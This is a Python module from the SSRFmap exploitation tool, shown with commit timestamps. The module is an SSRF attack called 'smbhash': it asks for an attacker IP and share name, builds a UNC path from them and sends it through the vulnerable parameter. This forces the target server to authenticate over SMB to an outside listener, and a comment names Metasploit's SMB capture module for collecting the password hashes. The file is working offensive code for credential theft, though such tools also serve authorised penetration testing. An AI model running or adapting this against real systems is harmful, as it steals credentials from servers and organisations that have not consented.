2018-10-18 11:37:28 +00:00
|
|
|
from core.utils import *
|
|
|
|
|
import logging
|
|
|
|
|
|
|
|
|
|
# NOTE
|
|
|
|
|
# Use auxiliary/server/capture/smb from Metasploit to setup a listener
|
|
|
|
|
|
|
|
|
|
name = "smbhash"
|
|
|
|
|
description = "Force an SMB authentication attempt by embedding a UNC path (\\SERVER\SHARE) "
|
|
|
|
|
author = "Swissky"
|
|
|
|
|
documentation = []
|
|
|
|
|
|
|
|
|
|
class exploit():
|
|
|
|
|
UNC_EXAMPLE = "\\\\192.168.1.2\\SSRFmap"
|
|
|
|
|
UNC_IP = "192.168.1.2"
|
|
|
|
|
UNC_FILE = "SSRFmap"
|
|
|
|
|
|
|
|
|
|
def __init__(self, requester, args):
|
2022-03-16 18:27:30 +00:00
|
|
|
logging.info(f"Module '{name}' launched !")
|
2018-10-18 11:37:28 +00:00
|
|
|
|
|
|
|
|
UNC_IP = input("UNC IP (default: 192.168.1.2): ")
|
|
|
|
|
if UNC_IP != '':
|
|
|
|
|
self.UNC_IP = UNC_IP
|
|
|
|
|
|
|
|
|
|
UNC_FILE = input("UNC File (default: SSRFmap): ")
|
|
|
|
|
if UNC_FILE != '':
|
|
|
|
|
self.UNC_FILE = UNC_FILE
|
|
|
|
|
|
|
|
|
|
payload = wrapper_unc(self.UNC_FILE, self.UNC_IP)
|
|
|
|
|
r = requester.do_request(args.param, payload)
|
2022-03-16 18:27:30 +00:00
|
|
|
logging.info(f"\033[32mSending UNC Path\033[0m : {payload}")
|
